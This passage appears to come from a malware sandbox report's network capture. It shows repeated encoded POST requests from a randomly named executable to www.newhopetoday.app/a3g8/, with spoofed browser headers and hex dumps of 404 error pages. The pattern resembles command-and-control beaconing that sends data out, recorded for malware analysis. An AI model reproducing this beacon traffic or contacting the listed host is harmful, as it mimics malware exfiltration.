                                                                                                                                                                          Data Ascii: ger.com/gtag/js?id=UA-26575989-44" async></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class
                                                                                                                                                                          Oct 23, 2024 17:15:33.912127018 CEST1236INData Raw: 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 69 67 6e 2d 69 6e 2d 61 6c 74 22 3e 3c 2f 69 3e 20 4c 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                                                                                                                          Data Ascii: ue class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to
                                                                                                                                                                          Oct 23, 2024 17:15:33.912162066 CEST1236INData Raw: 20 48 6f 73 74 69 6e 67 65 72 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 35 38 33 32 31 34 2d 68 6f 77 2d 74
                                                                                                                                                                          Data Ascii: Hostinger.</p><br><a href=https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-cu
                                                                                                                                                                          Oct 23, 2024 17:15:33.912195921 CEST1236INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 72 2c 65 2c 6e 29 7b 76 61 72 20 74 3b 66 6f 72 28 72 3d 6e 3f 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 37 30 30 29 3a 72 3e 3e 31 2c 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 65 29 2c 74 3d 30 3b 34 35 35
                                                                                                                                                                          Data Ascii: }function n(r,e,n){var t;for(r=n?Math.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=
                                                                                                                                                                          Oct 23, 2024 17:15:33.912231922 CEST1124INData Raw: 28 29 29 29 2e 6c 65 6e 67 74 68 3b 69 66 28 61 29 66 6f 72 28 64 3d 30 3b 64 3c 76 3b 64 2b 2b 29 77 5b 64 5d 3d 74 5b 64 5d 21 3d 77 5b 64 5d 3b 76 61 72 20 6d 2c 79 3d 5b 5d 3b 66 6f 72 28 68 3d 31 32 38 2c 75 3d 37 32 2c 64 3d 66 3d 30 3b 64
                                                                                                                                                                          Data Ascii: ())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          45192.168.2.550022216.40.34.41802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:39.355863094 CEST781OUTPOST /a3g8/ HTTP/1.1
                                                                                                                                                                          Host: www.newhopetoday.app
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.newhopetoday.app
                                                                                                                                                                          Referer: http://www.newhopetoday.app/a3g8/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 6d 41 70 4e 67 35 63 62 6d 70 53 52 2b 59 6f 6e 6e 45 36 62 6b 2b 5a 61 6c 70 34 34 56 53 55 4b 4c 78 50 46 7a 79 62 4e 66 6d 51 4e 74 39 6d 4d 77 75 36 44 58 31 5a 71 7a 4f 5a 32 7a 66 6c 73 55 48 78 69 62 73 4a 4f 6b 6e 6f 33 30 35 46 4f 51 43 32 74 59 76 4b 74 4c 38 51 54 2f 6a 52 49 77 6b 6d 58 43 35 6a 65 71 37 2b 52 42 77 64 63 58 73 31 30 35 49 6a 35 75 68 65 47 62 34 79 57 45 2b 55 46 47 68 48 37 74 2f 32 62 54 42 6e 30 6c 59 48 47 6f 50 56 69 46 70 4e 36 4a 64 6e 32 4a 4f 6d 54 44 6e 30 4c 75 34 55 4f 4a 4a 2b 69 75 58 72 36 72 43 70 31 53 34 4a 6b 51 30 75 6f 77 77 78 77 53 63 77 3d
                                                                                                                                                                          Data Ascii: 9X=mApNg5cbmpSR+YonnE6bk+Zalp44VSUKLxPFzybNfmQNt9mMwu6DX1ZqzOZ2zflsUHxibsJOkno305FOQC2tYvKtL8QT/jRIwkmXC5jeq7+RBwdcXs105Ij5uheGb4yWE+UFGhH7t/2bTBn0lYHGoPViFpN6Jdn2JOmTDn0Lu4UOJJ+iuXr6rCp1S4JkQ0uowwxwScw=
                                                                                                                                                                          Oct 23, 2024 17:15:40.064910889 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                          x-request-id: 41c18197-57bc-4078-8050-57ec7204a88d
                                                                                                                                                                          x-runtime: 0.036139
                                                                                                                                                                          content-length: 17097
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:15:40.064941883 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                                                                                                                          Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                                                                                                                                          Oct 23, 2024 17:15:40.064953089 CEST424INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                                                                                                                                          Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                                                                                                                                          Oct 23, 2024 17:15:40.065104008 CEST1236INData Raw: 5f 74 61 62 6c 65 20 74 62 6f 64 79 2e 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65
                                                                                                                                                                          Data Ascii: _table tbody.fuzzy_matches { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none;
                                                                                                                                                                          Oct 23, 2024 17:15:40.065115929 CEST1236INData Raw: 63 65 26 23 33 39 3b 29 3b 68 69 64 65 28 26 23 33 39 3b 46 75 6c 6c 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c
                                                                                                                                                                          Data Ascii: ce&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false
                                                                                                                                                                          Oct 23, 2024 17:15:40.065129042 CEST1236INData Raw: 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e
                                                                                                                                                                          Data Ascii: _ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_di
                                                                                                                                                                          Oct 23, 2024 17:15:40.065134048 CEST1236INData Raw: 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73
                                                                                                                                                                          Data Ascii: (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9)
                                                                                                                                                                          Oct 23, 2024 17:15:40.065140963 CEST1236INData Raw: 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63
                                                                                                                                                                          Data Ascii: k (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-i
                                                                                                                                                                          Oct 23, 2024 17:15:40.065154076 CEST1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 34 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a
                                                                                                                                                                          Data Ascii: "trace-frames" data-frame-id="14" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-f
                                                                                                                                                                          Oct 23, 2024 17:15:40.065171003 CEST1236INData Raw: 64 22 3b 0a 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 65 64 46 72 61 6d 65 20 3d 20 74 61 72 67 65 74 3b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 43 68 61 6e 67 65 20 74 68 65 20 65 78 74 72 61 63 74 65 64 20 73 6f 75 72 63 65 20 63 6f 64 65 0a 20
                                                                                                                                                                          Data Ascii: d"; selectedFrame = target; // Change the extracted source code changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_
                                                                                                                                                                          Oct 23, 2024 17:15:40.070509911 CEST1236INData Raw: 63 74 5f 6d 61 74 63 68 65 73 27 3e 0a 20 20 3c 2f 74 62 6f 64 79 3e 0a 20 20 3c 74 62 6f 64 79 20 63 6c 61 73 73 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 20 69 64 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 3e 0a 20 20 3c 2f 74 62 6f
                                                                                                                                                                          Data Ascii: ct_matches'> </tbody> <tbody class='fuzzy_matches' id='fuzzy_matches'> </tbody> <tbody> <tr class='route_row' data-helper='path'> <td data-route-name='root'> root<span class='helper'>_path</span> </td> <td> GET </


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          46192.168.2.550023216.40.34.41802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:41.899935961 CEST801OUTPOST /a3g8/ HTTP/1.1
                                                                                                                                                                          Host: www.newhopetoday.app
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.newhopetoday.app
                                                                                                                                                                          Referer: http://www.newhopetoday.app/a3g8/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 6d 41 70 4e 67 35 63 62 6d 70 53 52 34 38 73 6e 69 6c 36 62 6c 65 5a 5a 35 5a 34 34 66 79 55 4f 4c 78 44 46 7a 7a 65 56 66 77 49 4e 74 63 57 4d 78 72 4f 44 55 31 5a 71 34 75 5a 33 39 2f 6b 67 55 48 38 42 62 70 78 4f 6b 6e 38 33 30 34 31 4f 54 7a 32 75 4b 50 4b 34 48 63 51 52 79 44 52 49 77 6b 6d 58 43 35 33 30 71 37 6d 52 42 67 4e 63 57 4a 42 33 6c 59 6a 2b 2b 52 65 47 4b 6f 7a 66 45 2b 55 72 47 6c 6e 52 74 39 2b 62 54 46 33 30 6c 73 7a 48 78 2f 56 67 59 35 4d 47 47 2f 48 35 47 74 32 6b 41 6b 46 74 37 4c 49 4b 42 66 50 49 30 31 6a 53 34 69 46 4e 43 72 42 54 42 45 50 42 71 54 68 41 4d 4c 6d 35 6a 6d 38 4c 41 6c 69 50 52 62 52 30 6c 42 47 70 33 34 79 2b
                                                                                                                                                                          Data Ascii: 9X=mApNg5cbmpSR48snil6bleZZ5Z44fyUOLxDFzzeVfwINtcWMxrODU1Zq4uZ39/kgUH8BbpxOkn83041OTz2uKPK4HcQRyDRIwkmXC530q7mRBgNcWJB3lYj++ReGKozfE+UrGlnRt9+bTF30lszHx/VgY5MGG/H5Gt2kAkFt7LIKBfPI01jS4iFNCrBTBEPBqThAMLm5jm8LAliPRbR0lBGp34y+
                                                                                                                                                                          Oct 23, 2024 17:15:42.597995043 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                          x-request-id: 2fd6578b-25e4-4c3f-bccc-0ed416078f32
                                                                                                                                                                          x-runtime: 0.025065
                                                                                                                                                                          content-length: 17117
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:15:42.598081112 CEST212INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                                                                                                                          Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; }
                                                                                                                                                                          Oct 23, 2024 17:15:42.598092079 CEST1236INData Raw: 20 20 20 2e 73 6f 75 72 63 65 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64
                                                                                                                                                                          Data Ascii: .source { border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; bac
                                                                                                                                                                          Oct 23, 2024 17:15:42.598103046 CEST1236INData Raw: 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f
                                                                                                                                                                          Data Ascii: it-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches {
                                                                                                                                                                          Oct 23, 2024 17:15:42.598115921 CEST1236INData Raw: 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 61 33 67
                                                                                                                                                                          Data Ascii: Error</h1></header><div id="container"> <h2>No route matches [POST] &quot;/a3g8&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#
                                                                                                                                                                          Oct 23, 2024 17:15:42.598126888 CEST1236INData Raw: 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32
                                                                                                                                                                          Data Ascii: ace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:28:in `call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br>
                                                                                                                                                                          Oct 23, 2024 17:15:42.598139048 CEST848INData Raw: 72 61 63 6b 2f 73 65 6e 64 66 69 6c 65 2e 72 62 3a 31 31 30 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31
                                                                                                                                                                          Data Ascii: rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br><a class="trace-frames" data-frame-id="14" href="#">puma (4.3.9) lib/puma/configuration
                                                                                                                                                                          Oct 23, 2024 17:15:42.598416090 CEST1236INData Raw: 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 30 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f
                                                                                                                                                                          Data Ascii: ><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions.rb:65:in `call&#39;</a><br><a class="trace-frames" data-frame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middlew
                                                                                                                                                                          Oct 23, 2024 17:15:42.598427057 CEST1236INData Raw: 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 63 61 63 68 65 2f 73 74 72 61 74 65 67 79 2f 6c 6f 63 61 6c 5f 63 61 63 68 65 5f 6d 69 64 64 6c 65 77 61 72 65 2e 72 62 3a 32 39 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39
                                                                                                                                                                          Data Ascii: 5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-id="10" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trac
                                                                                                                                                                          Oct 23, 2024 17:15:42.598438025 CEST1236INData Raw: 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 76 61 72 20 74 72 61 63 65 46 72 61 6d 65 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 27 74 72 61 63 65 2d 66 72 61 6d
                                                                                                                                                                          Data Ascii: ext/javascript"> var traceFrames = document.getElementsByClassName('trace-frames'); var selectedFrame, currentSource = document.getElementById('frame-source-0'); // Add click listeners for all stack frames for (var i = 0; i <
                                                                                                                                                                          Oct 23, 2024 17:15:42.603463888 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 3c 74 68 3e 48 65 6c 70 65 72 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 48 54 54 50 20 56 65 72 62 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 50 61 74 68 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 43 6f 6e
                                                                                                                                                                          Data Ascii: > <th>Helper</th> <th>HTTP Verb</th> <th>Path</th> <th>Controller#Action</th> </tr> <tr class='bottom'> <th> <a data-route-helper="_path" title="Returns a relative path (without the http or domain)


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          47192.168.2.550024216.40.34.41802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:44.539202929 CEST1818OUTPOST /a3g8/ HTTP/1.1
                                                                                                                                                                          Host: www.newhopetoday.app
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.newhopetoday.app
                                                                                                                                                                          Referer: http://www.newhopetoday.app/a3g8/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
